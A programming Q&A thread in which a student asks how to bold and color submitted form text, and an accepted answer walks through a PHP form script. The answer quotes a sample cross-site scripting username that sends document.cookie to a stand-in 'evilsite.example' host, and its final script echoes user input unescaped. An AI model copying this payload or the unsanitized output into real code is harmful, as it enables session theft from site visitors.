# Turning text input into bold after checbox is checked and change color after clicking radio button

Tags: php, html, css

I am new to HTML, CSS, and PHP and I need some help. After looking up online how to solve my problems, I am completely at a lost and honestly can't find any useful solutions, and any help or suggestion will be appreciated!

I have an assignment and I'm trying to write an HTML form that will take the user's input, and a string of characters and numbers, to change the color of the input after a radio button is clicked. I also need to make the input bold after a checkbox is checked.

One last thing, how can I check whether the string is in bold or not using php?

This is what I have

```
<input type="text" class="textBold" id="textInput">
<input type="checkbox" class="checkText" id="checkInput"> <label> Bold Text </label>
```

and this is the css

```
.checkText:checked + input
{
   font-weight: bold;
}
```

I know what I have is obviously wrong. Again, any help would be appreciated!

Comment: Why is PHP even part of this? This is what Javascript is for.

Comment: `.checkText:checked + input` --> `.checkText:checked + label`

Comment: @TemaniAfif You should suggest that as your solution

Comment: @ezw i don't think so as if it's only this i would consider as simple typo issue .. and the remaining part of the question is too broad and i didn't understand what we want

Comment: I asked about php because we haven't got to javascript yet, and I didn't want to use or do something that we haven't gone over. And wouldn't using the label bold the label for the checkbox instead? I am trying to bold the user's input after they check the checkbox.

Comment: Do you want the changes to the user's input to happen **after** submitting the form (you'll need PHP for that) or immediately as soon as the checkbox/radio button changes state (you'll need Javascript for that)?

Comment: Definitely after. And I have never done any PHP before besides doing the in-class activity where the professor guides us. Any help, again, would be really appreciated! And change the color too, if that's possible.

Comment: You should consider asking these as separate questions.  Also, you don't have code posted for the color, so it's kinda hard for someone to guide you on that.

Comment: I asked that way because I didn't want to "spam" or make more than 1 thread and piss people off. I thought it would be more bearable for you guys if I did it this way. As for the color, I copied and pasted what I had from VS and not quite sure why it didn't turn the right way. Sorry

Answer (score 0, accepted):

Since this is for an assignment:

*<tutorial mode="on" tldr="see the finished script at the bottom">*

You want the user's input to have a certain style (bold, colored) depending on certain options from a form. So to start with, you need a form that will allow the user to enter some text, select the appearance options and submit it to the server.

Here's a basic example:

```
<form method="post">
    <label>Your text: <input type="text" name="input"></label><br><br>
    <label><input type="checkbox" name="bold"> Make it bold</label><br><br>
    <label><input type="radio" name="color" value="red"> Make it red</label><br>
    <label><input type="radio" name="color" value="green"> Make it green</label><br>
    <label><input type="radio" name="color" value="blue"> Make it blue</label><br><br>
    <input type="submit" value="Do it!">
</form>
```

Note the field names:

- "input" for the text field that will contain the user's text
- "bold" for the checkbox that will indicate the text should be bold
- "color" for the radio buttons that indicate a particular color

You also need somewhere to display the results of the user's choices. This means we're going to have to think ahead a little: how are we going to pass the text the user entered and the styling information to the HTML code? Obviously we'll need at least one variable, but what would be the most sane, readable and clean way to do this?

There are several ways to style a piece of text in HTML. You could use inline styling:

```
<span style="font-weight: bold; color: red">Bold and red!</span>
```

Or you could use classes:

```
<style>
    .bold { font-weight: bold; }
    .red { color: red; }
</style>
<span class="bold red">Red and bold!</span>
```

Hell, you could even go full-on old-school:

```
<font color="red"><b>Also bold and red!</b></font>
```

You'll have to make your own choice on which way you prefer. For this tutorial I'm going with CSS classes, so let's define them:

```
<style>
    .bold { font-weight: bold; }
    .red { color: red; }
    .green { color: green; }
    .blue { color: blue; }
</style>
```

Choosing this way means I'll need two PHP variables: one for the text the user entered, and one for the CSS classes that apply to that text. I'll name them `$user_input` and `$classes` and add them underneath the form:

```
<div class="<?php echo $classes; ?>">
    <?php echo $user_input; ?>
</div>
```

> For convenience sake I'll assume your class hasn't covered cross-site scripting yet, so I'm not going to go into sanitizing the user's input and making sure it's safe for displaying. Ask your teacher about the risks of this sort of thing, for example if it's part of a site where users have a profile and are allowed to style their own username which is then rendered bold/colored for every site's visitor, and some malicious user entered a username like `Bob<script>document.write('<script src="https://evilsite.example/steal?cookies=' + escape(document.cookie) + '"></script>');</script>`.

Now it's time to delve into PHP. I'm going to put all my code at the very beginning of the file, because that's where I *personally* feel it belongs. For this project though, it doesn't really matter where you put it as long as it's **before** that `<div>` where you're going to output the results.

First let's define our two variables to initially be empty:

```
<?php
$user_input = "";
$classes = "";
```

Great. To actually set their values we need to access the information submitted by the user. These values are only going to be available after the form has actually been submitted. Since we've set the form's `method` attribute to `post`, we can easily check for that:

```
if ($_SERVER['REQUEST_METHOD'] == "POST") {
}
```

Inside those brackets is where we'll get to work. When a form submits data to the server using the "post" method, these fields will be available in PHP from the native `$_POST` array. To retrieve the values we need to know the names of the input fields from the form (see above). So, whatever text the user filled in should be in `$_POST['input']`. The checkbox (if checked) will be in `$_POST['bold']` and the color (if any was selected) will be in `$_POST['color']`.

There are some quirks to take into account: if the checkbox is NOT checked, it will not be submitted to the server. Likewise, if none of the radio buttons are selected, they will also not be submitted to the server. This makes sense when you think about it, but this also means that simply accessing `$_POST['bold']` will give you an "undefined index" warning if the checkbox was not checked (since there will be no index called "bold" in the `$_POST` array). Fortunately, we can use PHP's `isset()` function to check if a value was set.

Now you also know why we needed to define our variables with an empty value earlier: if the request method is NOT "POST" (i.e.: if the user first opens the form and hasn't submitted the form yet), we won't be doing anything and we could get "undefined variable" notices when we try to display them.

First let's fill our `$user_input` variable, since that one's easiest:

```
    $user_input = $_POST['input'];
```

Filling the `$classes` variable requires some conditional checks. Let's first check if we need to make the text bold:

```
    if (isset($_POST['bold'])) {
        $classes .= "bold";
    }
```

Remember: if the checkbox was not checked, `$_POST['bold']` will not exist. So we don't need to check for any specific values; if it exists, we need to make the text bold. Simple as that.

Next up is the color:

```
    if (isset($_POST['color'])) {
        $classes .= " ";
        $classes .= $_POST['color'];
    }
```

That space is there to make sure the classes are separated. It doesn't matter if we didn't set the "bold" class, browsers will simply ignore the space in that case. If we don't add the space, we risk ending up with a class called "boldgreen" instead of the two classes "bold green". Note that in this example, I named the CSS classes the same as the color. We could have also named them "pretty", "beautiful" and "unicorn", as long as our radio buttons' values match them.

So now, if a user has entered the text "Hello, world!", checked the checkbox and selected the blue radio button, `$user_input` will be "Hello, world!" and `$classes` will be "bold blue", which will be rendered as:

```
<div class="bold blue">
    Hello, world!
</div>
```

*<tutorial mode="off">*

Putting this all together, we end up with the following file:

```
<?php
$user_input = "";
$classes = "";

if ($_SERVER['REQUEST_METHOD'] == "POST") {
    $user_input = $_POST['input'];

    if (isset($_POST['bold'])) {
        $classes .= "bold";
    }

    if (isset($_POST['color'])) {
        $classes .= " ";
        $classes .= $_POST['color'];
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Assignment</title>
    <style>
        .bold { font-weight: bold; }
        .red { color: red; }
        .green { color: green; }
        .blue { color: blue; }
    </style>
</head>
<body>
    <form method="post">
        <label>Your text: <input type="text" name="input"></label><br><br>
        <label><input type="checkbox" name="bold"> Make it bold</label><br><br>
        <label><input type="radio" name="color" value="red"> Make it red</label><br>
        <label><input type="radio" name="color" value="green"> Make it green</label><br>
        <label><input type="radio" name="color" value="blue"> Make it blue</label><br><br>
        <input type="submit" value="Do it!">
    </form>
    <div class="<?php echo $classes; ?>">
        <?php echo $user_input; ?>
    </div>
</body>
</html>
```

See it in action [here](http://phpfiddle.org/lite?code=%3C%3Fphp%0D%0A%24user_input%20%3D%20%22%22%3B%0D%0A%24classes%20%3D%20%22%22%3B%0D%0A%0D%0Aif%20%28%24_SERVER%5B%27REQUEST_METHOD%27%5D%20%3D%3D%20%22POST%22%29%20%7B%0D%0A%20%20%20%20%24user_input%20%3D%20%24_POST%5B%27input%27%5D%3B%0D%0A%0D%0A%20%20%20%20if%20%28isset%28%24_POST%5B%27bold%27%5D%29%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%24classes%20.%3D%20%22bold%22%3B%0D%0A%20%20%20%20%7D%0D%0A%0D%0A%20%20%20%20if%20%28isset%28%24_POST%5B%27color%27%5D%29%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%24classes%20.%3D%20%22%20%22%3B%0D%0A%20%20%20%20%20%20%20%20%24classes%20.%3D%20%24_POST%5B%27color%27%5D%3B%0D%0A%20%20%20%20%7D%0D%0A%7D%0D%0A%3F%3E%0D%0A%3C%21DOCTYPE%20html%3E%0D%0A%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%20%20%20%20%3Ctitle%3EAssignment%3C%2Ftitle%3E%0D%0A%20%20%20%20%3Cstyle%3E%0D%0A%20%20%20%20%20%20%20%20.bold%20%7B%20font-weight%3A%20bold%3B%20%7D%0D%0A%20%20%20%20%20%20%20%20.red%20%7B%20color%3A%20red%3B%20%7D%0D%0A%20%20%20%20%20%20%20%20.green%20%7B%20color%3A%20green%3B%20%7D%0D%0A%20%20%20%20%20%20%20%20.blue%20%7B%20color%3A%20blue%3B%20%7D%0D%0A%20%20%20%20%3C%2Fstyle%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3E%0D%0A%20%20%20%20%3Cform%20method%3D%22post%22%3E%0D%0A%20%20%20%20%20%20%20%20%3Clabel%3EYour%20text%3A%20%3Cinput%20type%3D%22text%22%20name%3D%22input%22%3E%3C%2Flabel%3E%3Cbr%3E%3Cbr%3E%0D%0A%20%20%20%20%20%20%20%20%3Clabel%3E%3Cinput%20type%3D%22checkbox%22%20name%3D%22bold%22%3E%20Make%20it%20bold%3C%2Flabel%3E%3Cbr%3E%3Cbr%3E%0D%0A%20%20%20%20%20%20%20%20%3Clabel%3E%3Cinput%20type%3D%22radio%22%20name%3D%22color%22%20value%3D%22red%22%3E%20Make%20it%20red%3C%2Flabel%3E%3Cbr%3E%0D%0A%20%20%20%20%20%20%20%20%3Clabel%3E%3Cinput%20type%3D%22radio%22%20name%3D%22color%22%20value%3D%22green%22%3E%20Make%20it%20green%3C%2Flabel%3E%3Cbr%3E%0D%0A%20%20%20%20%20%20%20%20%3Clabel%3E%3Cinput%20type%3D%22radio%22%20name%3D%22color%22%20value%3D%22blue%22%3E%20Make%20it%20blue%3C%2Flabel%3E%3Cbr%3E%3Cbr%3E%0D%0A%20%20%20%20%20%20%20%20%3Cinput%20type%3D%22submit%22%20value%3D%22Do%20it%21%22%3E%0D%0A%20%20%20%20%3C%2Fform%3E%0D%0A%20%20%20%20%3Cdiv%20class%3D%22%3C%3Fphp%20echo%20%24classes%3B%20%3F%3E%22%3E%0D%0A%20%20%20%20%20%20%20%20%3C%3Fphp%20echo%20%24user_input%3B%20%3F%3E%0D%0A%20%20%20%20%3C%2Fdiv%3E%0D%0A%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E).

I encourage you to play with this. Add some different colors, perhaps add another checkbox to make the text italic or underlined. Maybe add a different group of radio buttons to select the font or text size. Copy/paste is good if you're in a hurry, but you need to edit/experience to really learn.

Don't forget that there are many ways to shave a bear, this is just one example.

Comment: Thank you so much!!! I will definitely play around with it! The way you explained this made everything much clearer too!!!